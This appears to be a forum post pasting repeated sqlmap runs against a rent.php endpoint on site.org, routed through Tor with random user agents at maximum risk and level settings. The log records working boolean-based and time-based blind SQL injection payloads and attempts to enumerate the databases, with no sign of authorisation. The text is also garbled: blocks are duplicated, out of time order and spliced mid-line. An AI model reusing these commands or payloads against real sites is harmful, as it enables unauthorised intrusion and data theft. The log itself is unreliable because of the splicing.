[12:58:03] [INFO]testing'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[12:58:04] [INFO]testing'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[12:58:05] [INFO]testing'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:58:05] [INFO]testing'PostgreSQL OR error-based - WHERE or HAVING clause'
[12:58:06] [INFO]testing'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:58:06] [INFO]testing'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[12:58:07] [INFO]testing'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[12:58:07] [INFO]testing'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'
[12:58:08] [INFO]testing'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[12:58:08] [INFO]testing'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'
[12:58:09] [INFO]testing'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:58:09] [INFO]testing'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[12:58:10] [INFO]testing'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ ADDRESS)'
[12:58:10] [INFO]testing'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ ADDRESS)'
[12:58:11] [INFO]testing'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[12:58:11] [INFO]testing'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[12:58:12] [INFO]testing'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_T O_SQLHASH)'
[12:58:12] [INFO]testing'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_T O_SQLHASH)'
[12:58:13] [INFO]testing'Firebird AND error-based - WHERE or HAVING clause'
[12:58:13] [INFO]testing'Firebird OR error-based - WHERE or HAVING clause'
[12:58:14] [INFO]testing'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:58:14] [INFO]testing'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:58:15] [INFO]testing'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:58:15] [INFO]testing'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[12:58:15] [INFO]testing'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:58:16] [INFO]testing'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:58:16] [INFO]testing'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:58:17] [INFO]testing'PostgreSQL error-based - Parameter replace'
[12:58:17] [INFO]testing'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[12:58:18] [INFO]testing'Microsoft SQL Server/Sybase error-based - Parameter replace'
[12:58:18] [INFO]testing'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[12:58:19] [INFO]testing'Oracle error-based - Parameter replace'
[12:58:19] [INFO]testing'Firebird error-based - Parameter replace'
[12:58:20] [INFO]testing'MySQL inline queries'
[12:58:20] [INFO]testing'PostgreSQL inline queries'
[12:58:21] [INFO]testing'Microsoft SQL Server/Sybase inline queries'
[12:58:21] [INFO]testing'Oracle inline queries'
[12:58:21] [INFO]testing'SQLite inline queries'
[12:58:22] [INFO]testing'Firebird inline queries'
[12:58:22] [INFO]testing'MySQL > 5.0.11 stacked queries (comment)'
[12:58:23] [INFO]testing'MySQL > 5.0.11 stacked queries'
[12:58:23] [INFO]testing'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[12:58:24] [INFO]testing'MySQL > 5.0.11 stacked queries (query SLEEP)'
[12:58:24] [INFO]testing'MySQL 8.1 stacked queries (comment)'
[12:58:26] [INFO]testing'PostgreSQL > 8.1 stacked queries'
[12:58:26] [INFO]testing'PostgreSQL stacked queries (heavy quer y - comment)'
[12:58:27] [INFO]testing'PostgreSQL stacked queries (heavy quer y)'
[12:58:27] [INFO]testing'PostgreSQL 2.0 stacked queries (heav y query - comment)'
[12:58:35] [INFO]testing'SQLite > 2.0 stacked queries (heavy query)'
[12:58:36] [INFO]testing'Firebird stacked queries (heavy query - comment)'
[12:58:36] [INFO]testing'Firebird stacked queries (heavy query) '
[12:58:37] [INFO]testing'SAP MaxDB stacked queries (heavy quer y - comment)'
[12:58:37] [INFO]testing'SAP MaxDB stacked queries (heavy quer y)'
[12:58:38] [INFO]testing'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)'
[12:58:38] [INFO]testing'HSQLDB >= 1.7.2 stacked queries (heavy query)'
[12:58:39] [INFO]testing'HSQLDB >= 2.0 stacked queries (heavy query - comment)'
[12:58:39] [INFO]testing'HSQLDB >= 2.0 stacked queries (heavy query)'
[12:58:40] [INFO]testing'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:59:21] [INFO]URI parameter'#1*'appears to be'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'injectable
it looks like the back-end DBMS is'MySQL'. Doyou want to skip test payloads specificforother DBMSes? [Y/n]y
[12:59:44] [INFO]testing'Generic UNION query (NULL) - 1 to 20 columns'
[12:59:44] [INFO]automatically extending rangesforUNION query i njection technique testsasthere is at least one other(potential)techni
que found
[12:59:45] [INFO]'ORDER BY'technique appears to be usable.This should reduce the time needed to find the right number of query columns.A
utomatically extending the rangeforcurrent UNI ON query injection technique test
[12:59:47] [INFO]target URL appears to have 1 column in que ry
[12:59:49] [WARNING] ifUNION based SQL injection is not detecte d,please considerand/or tryto force the back-end DBMS(e.g.'--dbms=mysql
')
[12:59:59] [INFO]target URL appears to be UNION injectable w ith 1 columns
[13:00:01] [INFO]testing'Generic UNION query (random number) - 1 to 20 columns'
[13:00:13] [INFO]testing'Generic UNION query (NULL) - 21 to 40 columns'
[13:00:24] [INFO]testing'Generic UNION query (random number) - 21 to 40 columns'
[13:00:34] [INFO]testing'Generic UNION query (NULL) - 41 to 60 columns'
[13:00:44] [INFO]testing'Generic UNION query (random number) - 41 to 60 columns'
[13:00:54] [INFO]testing'Generic UNION query (NULL) - 61 to 80 columns'
[13:01:04] [INFO]testing'Generic UNION query (random number) - 61 to 80 columns'
[13:01:16] [INFO]testing'Generic UNION query (NULL) - 81 to 100 columns'
[13:01:29] [INFO]testing'Generic UNION query (random number) - 81 to 100 columns'
[13:01:39] [INFO]checkingifthe injection point on URI paramete r'#1*'is a false positive
URI parameter'#1*'is vulnerable. Doyou want t o keep testing the others(ifany)? [y/N]n
sqlmap identified the following injection poi nt(s)with a total of 364 HTTP(s)requests:
---
Parameter:#1* (URI)
Type:boolean-based blind
Title: ANDboolean-based blind-WHEREorHAVING clause
Payload:http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
Type:time-based blind
Title:MySQL>=5.0.12ANDtime-based blind(query SLEEP)
Payload:http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLE EP(
10)))flbR)&timereset=2
---
[13:02:06] [INFO]the back-end DBMS is MySQL
web application technology:Nginx,PHP
back-end DBMS:MySQL>=5.0.12
[13:02:06] [INFO]fetching database names
[13:02:06] [INFO]fetching number of databases
[13:02:06] [WARNING]running in a single-thread mode.Please consider usage of option'--threads'forfaster data retrieval
[13:02:06] [INFO]retrieved:
[13:02:08] [INFO]retrieved:
[13:02:08] [WARNING]it is very important to not stress the net work connection during usage of time-based payloads to prevent potential disr
uptions
[13:02:09] [WARNING]incaseof continuous data retrieval problems y ou are advised totryaswitch'--no-cast'or switch'--hex'
[13:02:09] [ERROR]unable to retrieve the number of databases
[13:02:09] [INFO]falling back to current database
[13:02:09] [INFO]fetching current database
[13:02:09] [INFO]retrieved:
[13:02:11] [INFO]retrieved:
[13:02:12] [CRITICAL]unable to retrieve the database names
[13:02:12] [INFO]fetched data logged to text files under'outp ut\site.org'
ending@13:02:12/2019-09-14/
sqlmap.py-u"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"--random-agent--tor--tor-type=SOCKS5--risk=3--level=5--no-cast--dbs
___
__H__
___ ___[']_____ ___ ___ {1.3.9.9#dev}
|_ -| . ["] | .'| . |
|___|_[.]_|_|_|__,|_|
|_|V... |_|http://sqlmap.org
[!]legal disclaimer:Usage of sqlmapforattacking t argets without prior mutual consent is illeg al.It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume no liability and a re not responsible for any misuse or damage caused by
this program
starting @ 13:03:05 /2019-09-14/
[13:03:05] [WARNING] increasing default value for option '--time-sec' to 10 because switch '--tor' was provided
[13:03:05] [INFO] setting Tor SOCKS proxy settings
[13:03:06] [INFO] fetched random HTTP User-Agent header value 'Mozilla/4.0(compatible;MSIE 7.0b;Windows NT 6.0)' from file 'user-agents.txt'
custom injection marker ('*') found in optio n '-u'. Do you want to process it? [Y/n/q] y
[13:03:09] [INFO] resuming back-end DBMS 'mysql'
[13:03:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point( s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLE EP(
10)))flbR)&timereset=2
---
[13:03:10] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.12
[13:03:10] [INFO] fetching database names
[13:03:10] [INFO] fetching number of databases
[13:03:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:03:10] [INFO] retrieved:
[13:03:11] [WARNING] it's highly recommended to avoid usage ofs witch'--tor'fortime-based injections because of inherent high la tency tim
e
[13:03:11] [WARNING]time-based comparison requires larger statistical model,please wait........................... (do ne)
[13:03:37] [CRITICAL]considerable lagging has been detected in co nnection response(s).Pleaseuse ashigh valueforo ption'--time-sec'as
possible(e.g.10ormore)
[13:03:37] [WARNING]it is very important to not stress the net work connection during usage of time-based payloads to prevent potential disr
uptions
[13:03:38] [ERROR]unable to retrieve the number of databases
[13:03:38] [INFO]falling back to current database
[13:03:38] [INFO]fetching current database
[13:03:38] [INFO]retrieved:
[13:03:40] [INFO]retrieved:
[13:03:41] [CRITICAL]unable to retrieve the database names
[13:03:41] [INFO]fetched data logged to text files under'outp ut\site.org'
ending@13:03:41/2019-09-14/
sqlmap.py-u"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"--random-agent--tor--tor-type=SOCKS5--risk=3--level=5--hex--time-sec=10--dbs
___
__H__
___ ___[.]_____ ___ ___{1.3.9.9#dev}
|_-| . [,] | .'| . |
|___|_ [']_|_|_|__,|_|
|_|V... |_|http://sqlmap.org
[!]legal disclaimer:Usage of sqlmapforattacking t argets without prior mutual consent is illeg al.It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume no liability and a re not responsible for any misuse or damage caused by
this program
starting @ 13:05:03 /2019-09-14/
[13:05:03] [INFO] setting Tor SOCKS proxy settings
[13:05:04] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0(Windows NT 5.1;U;de;rv:1.9.1.6)Gecko/20091201 Firefox/3.5.6
Opera 11.00' from file 'user-agents.txt'
custom injection marker ('*') found in optio n '-u'. Do you want to process it? [Y/n/q] y
[13:05:08] [INFO] resuming back-end DBMS 'mysql'
[13:05:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point( s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLE EP(
10)))flbR)&timereset=2
---
[13:05:08] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.12
[13:05:08] [INFO] fetching database names
[13:05:08] [INFO] fetching number of databases
[13:05:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:05:10] [INFO] retrieved:
[13:05:10] [WARNING] it's highly recommended to avoid usage ofs witch'--tor'fortime-based injections because of inherent high la tency tim
e
[13:05:10] [WARNING]time-based comparison requires larger statistical model,please wait.......................... (don e)
[13:05:24] [WARNING]it is very important to not stress the net work connection during usage of time-based payloads to prevent potential disr
uptions
[13:05:25] [INFO]retrieved:
[13:05:25] [ERROR]unable to retrieve the number of databases
[13:05:25] [INFO]falling back to current database
[13:05:25] [INFO]fetching current database
[13:05:28] [INFO]retrieved:
[13:05:30] [INFO]retrieved:
[13:05:30] [CRITICAL]unable to retrieve the database names
[13:05:30] [INFO]fetched data logged to text files under'outp ut\site.org'
ending@13:05:30/2019-09-14/
Попробовал с --dbms=MySQL:
PHP:
sqlmap.py-u"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"--random-agent--tor--tor-type=SOCKS5--risk=3--level=5--hex--time-sec=15--dbms=MySQL--dbs
___
__H__
___ ___[.]_____ ___ ___{1.3.9.9#dev}
|_-| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for atta cking targets without prior mutual consent i s illegal. It is the end user's responsibil ity to
obey all applicable local, state and federal laws. Developers assume no liability and a re not responsible for any misuse or damage caused by
this program
starting @ 15:27:55 /2019-09-14/
[15:27:55] [INFO] setting Tor SOCKS proxy settings
[15:27:56] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) Appl eWebKit/534.24 (KHTML, lik
e Gecko) Chrome/11.0.696.68 Safari/534.24' from file 'user-agents.txt'
custom injection marker ('*') found in optio n '-u'. Do you want to process it? [Y/n/q] y
[15:27:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point( s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 6284=6284&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 5287 FROM (SELECT(SLE EP(
15)))FhgH)&timereset=2
---
[15:28:00] [INFO] testing MySQL
[15:28:00] [INFO] confirming MySQL
[15:28:03] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.2 (MariaDB fork)
[15:28:03] [WARNING] information_schema not available, back-end DBMS is MySQL = 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (BIGINT UNSIGNED)'
[12:57:57] [INFO]testing'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:57:58] [INFO]testing'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (EXP)'
[12:57:58] [INFO]testing'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:57:59] [INFO]testing'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (JSON_KEYS)'
[12:57:59] [INFO]testing'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:58:00] [INFO]testing'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (FLOOR)'
[12:58:00] [INFO]testing'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (FLOOR)'
[12:58:01] [INFO]testing'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (EXTRACTVALUE)'
[12:58:01] [INFO]testing'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (EXTRACTVALUE)'
[12:58:02] [INFO]testing'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (UPDATEXML)'
[12:58:02] [INFO]testing'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (UPDATEXML)'
[12:58:03] [INFO]testing'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY claus e (FLOOR)'
[12:58:03] [INFO]testing'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[12:58:04] [INFO]testing'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[12:58:05] [INFO]testing'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:58:05] [INFO]testing'PostgreSQL OR error-based - WHERE or HAVING clause'
[12:58:06] [INFO]testing'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:58:06] [INFO]testing'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[12:58:07] [INFO]testing'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[12:58:07] [INFO]testing'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'
[12:58:08] [INFO]testing'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[12:58:08] [INFO]testing'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'
[12:58:09] [INFO]testing'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:58:09] [INFO]testing'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[12:58:10] [INFO]testing'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ ADDRESS)'
[12:58:10] [INFO]testing'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ ADDRESS)'
[12:58:11] [INFO]testing'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[12:58:11] [INFO]testing'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[12:58:12] [INFO]testing'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_T O_SQLHASH)'
[12:58:12] [INFO]testing'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_T O_SQLHASH)'
[12:58:13] [INFO]testing'Firebird AND error-based - WHERE or HAVING clause'
[12:58:13] [INFO]testing'Firebird OR error-based - WHERE or HAVING clause'
[12:58:14] [INFO]testing'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:58:14] [INFO]testing'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:58:15] [INFO]testing'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:58:15] [INFO]testing'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[12:58:15] [INFO]testing'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:58:16] [INFO]testing'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:58:16] [INFO]testing'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:58:17] [INFO]testing'PostgreSQL error-based - Parameter replace'
[12:58:17] [INFO]testing'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[12:58:18] [INFO]testing'Microsoft SQL Server/Sybase error-based - Parameter replace'
[12:58:18] [INFO]testing'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[12:58:19] [INFO]testing'Oracle error-based - Parameter replace'
[12:58:19] [INFO]testing'Firebird error-based - Parameter replace'
[12:58:20] [INFO]testing'MySQL inline queries'
[12:58:20] [INFO]testing'PostgreSQL inline queries'
[12:58:21] [INFO]testing'Microsoft SQL Server/Sybase inline queries'
[12:58:21] [INFO]testing'Oracle inline queries'
[12:58:21] [INFO]testing'SQLite inline queries'
[12:58:22] [INFO]testing'Firebird inline queries'
[12:58:22] [INFO]testing'MySQL > 5.0.11 stacked queries (comment)'
[12:58:23] [INFO]testing'MySQL > 5.0.11 stacked queries'
[12:58:23] [INFO]testing'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[12:58:24] [INFO]testing'MySQL > 5.0.11 stacked queries (query SLEEP)'
[12:58:24] [INFO]testing'MySQL 8.1 stacked queries (comment)'
[12:58:26] [INFO]testing'PostgreSQL > 8.1 stacked queries'
[12:58:26] [INFO]testing'PostgreSQL stacked queries (heavy quer y - comment)'
[12:58:27] [INFO]testing'PostgreSQL stacked queries (heavy quer y)'
[12:58:27] [INFO]testing'PostgreSQL 2.0 stacked queries (heav y query - comment)'
[12:58:35] [INFO]testing'SQLite > 2.0 stacked queries (heavy query)'
[12:58:36] [INFO]testing'Firebird stacked queries (heavy query - comment)'
[12:58:36] [INFO]testing'Firebird stacked queries (heavy query) '
[12:58:37] [INFO]testing'SAP MaxDB stacked queries (heavy quer y - comment)'
[12:58:37] [INFO]testing'SAP MaxDB stacked queries (heavy quer y)'
[12:58:38] [INFO]testing'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)'
[12:58:38] [INFO]testing'HSQLDB >= 1.7.2 stacked queries (heavy query)'
[12:58:39] [INFO]testing'HSQLDB >= 2.0 stacked queries (heavy query - comment)'
[12:58:39] [INFO]testing'HSQLDB >= 2.0 stacked queries (heavy query)'
[12:58:40] [INFO]testing'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:59:21] [INFO]URI parameter'#1*'appears to be'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'injectable
it looks like the back-end DBMS is'MySQL'. Doyou want to skip test payloads specificforother DBMSes? [Y/n]y
[12:59:44] [INFO]testing'Generic UNION query (NULL) - 1 to 20 columns'
[12:59:44] [INFO]automatically extending rangesforUNION query i njection technique testsasthere is at least one other(potential)techni
que found
[12:59:45] [INFO]'ORDER BY'technique appears to be usable.This should reduce the time needed to find the right number of query columns.A
utomatically extending the rangeforcurrent UNI ON query injection technique test
[12:59:47] [INFO]target URL appears to have 1 column in que ry
[12:59:49] [WARNING] ifUNION based SQL injection is not detecte d,please considerand/or tryto force the back-end DBMS(e.g.'--dbms=mysql
')
[12:59:59] [INFO]target URL appears to be UNION injectable w ith 1 columns
[13:00:01] [INFO]testing'Generic UNION query (random number) - 1 to 20 columns'
[13:00:13] [INFO]testing'Generic UNION query (NULL) - 21 to 40 columns'
[13:00:24] [INFO]testing'Generic UNION query (random number) - 21 to 40 columns'
[13:00:34] [INFO]testing'Generic UNION query (NULL) - 41 to 60 columns'
[13:00:44] [INFO]testing'Generic UNION query (random number) - 41 to 60 columns'
[13:00:54] [INFO]testing'Generic UNION query (NULL) - 61 to 80 columns'
[13:01:04] [INFO]testing'Generic UNION query (random number) - 61 to 80 columns'
[13:01:16] [INFO]testing'Generic UNION query (NULL) - 81 to 100 columns'
[13:01:29] [INFO]testing'Generic UNION query (random number) - 81 to 100 columns'
[13:01:39] [INFO]checkingifthe injection point on URI paramete r'#1*'is a false positive
URI parameter'#1*'is vulnerable. Doyou want t o keep testing the others(ifany)? [y/N]n
sqlmap identified the following injection poi nt(s)with a total of 364 HTTP(s)requests:
---
Parameter:#1* (URI)
Type:boolean-based blind
Title: ANDboolean-based blind-WHEREorHAVING clause
Payload:http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
Type:time-based blind
Title:MySQL>=5.0.12ANDtime-based blind(query SLEEP)
Payload:http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLE EP(
10)))flbR)&timereset=2
---
[13:02:06] [INFO]the back-end DBMS is MySQL
web application technology:Nginx,PHP
back-end DBMS:MySQL>=5.0.12
[13:02:06] [INFO]fetching database names
[13:02:06] [INFO]fetching number of databases
[13:02:06] [WARNING]running in a single-thread mode.Please consider usage of option'--threads'forfaster data retrieval
[13:02:06] [INFO]retrieved:
[13:02:08] [INFO]retrieved:
[13:02:08] [WARNING]it is very important to not stress the net work connection during usage of time-based payloads to prevent potential disr
uptions
[13:02:09] [WARNING]incaseof continuous data retrieval problems y ou are advised totryaswitch'--no-cast'or switch'--hex'
[13:02:09] [ERROR]unable to retrieve the number of databases
[13:02:09] [INFO]falling back to current database
[13:02:09] [INFO]fetching current database
[13:02:09] [INFO]retrieved:
[13:02:11] [INFO]retrieved:
[13:02:12] [CRITICAL]unable to retrieve the database names
[13:02:12] [INFO]fetched data logged to text files under'outp ut\site.org'
ending@13:02:12/2019-09-14/
sqlmap.py-u"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"--random-agent--tor--tor-type=SOCKS5--risk=3--level=5--no-cast--dbs
___
__H__
___ ___[']_____ ___ ___ {1.3.9.9#dev}
|_ -| . ["] | .'| . |
|___|_[.]_|_|_|__,|_|
|_|V... |_|http://sqlmap.org
[!]legal disclaimer:Usage of sqlmapforattacking t argets without prior mutual consent is illeg al.It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume no liability and a re not responsible for any misuse or damage caused by
this program
starting @ 13:03:05 /2019-09-14/
[13:03:05] [WARNING] increasing default value for option '--time-sec' to 10 because switch '--tor' was provided
[13:03:05] [INFO] setting Tor SOCKS proxy settings
[13:03:06] [INFO] fetched random HTTP User-Agent header value 'Mozilla/4.0(compatible;MSIE 7.0b;Windows NT 6.0)' from file 'user-agents.txt'
custom injection marker ('*') found in optio n '-u'. Do you want to process it? [Y/n/q] y
[13:03:09] [INFO] resuming back-end DBMS 'mysql'
[13:03:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point( s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLE EP(
10)))flbR)&timereset=2
---
[13:03:10] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.12
[13:03:10] [INFO] fetching database names
[13:03:10] [INFO] fetching number of databases
[13:03:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:03:10] [INFO] retrieved:
[13:03:11] [WARNING] it's highly recommended to avoid usage ofs witch'--tor'fortime-based injections because of inherent high la tency tim
e
[13:03:11] [WARNING]time-based comparison requires larger statistical model,please wait........................... (do ne)
[13:03:37] [CRITICAL]considerable lagging has been detected in co nnection response(s).Pleaseuse ashigh valueforo ption'--time-sec'as
possible(e.g.10ormore)
[13:03:37] [WARNING]it is very important to not stress the net work connection during usage of time-based payloads to prevent potential disr
uptions
[13:03:38] [ERROR]unable to retrieve the number of databases
[13:03:38] [INFO]falling back to current database
[13:03:38] [INFO]fetching current database
[13:03:38] [INFO]retrieved:
[13:03:40] [INFO]retrieved:
[13:03:41] [CRITICAL]unable to retrieve the database names
[13:03:41] [INFO]fetched data logged to text files under'outp ut\site.org'
ending@13:03:41/2019-09-14/
sqlmap.py-u"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"--random-agent--tor--tor-type=SOCKS5--risk=3--level=5--hex--time-sec=10--dbs
___
__H__
___ ___[.]_____ ___ ___{1.3.9.9#dev}
|_-| . [,] | .'| . |
|___|_ [']_|_|_|__,|_|
|_|V... |_|http://sqlmap.org
[!]legal disclaimer:Usage of sqlmapforattacking t argets without prior mutual consent is illeg al.It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume no liability and a re not responsible for any misuse or damage caused by
this program
starting @ 13:05:03 /2019-09-14/
[13:05:03] [INFO] setting Tor SOCKS proxy settings
[13:05:04] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0(Windows NT 5.1;U;de;rv:1.9.1.6)Gecko/20091201 Firefox/3.5.6
Opera 11.00' from file 'user-agents.txt'
custom injection marker ('*') found in optio n '-u'. Do you want to process it? [Y/n/q] y
[13:05:08] [INFO] resuming back-end DBMS 'mysql'
[13:05:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point( s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLE EP(
10)))flbR)&timereset=2
---
[13:05:08] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.12
[13:05:08] [INFO] fetching database names
[13:05:08] [INFO] fetching number of databases
[13:05:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:05:10] [INFO] retrieved:
[13:05:10] [WARNING] it's highly recommended to avoid usage ofs witch'--tor'fortime-based injections because of inherent high la tency tim
e
[13:05:10] [WARNING]time-based comparison requires larger statistical model,please wait.......................... (don e)
[13:05:24] [WARNING]it is very important to not stress the net work connection during usage of time-based payloads to prevent potential disr
uptions
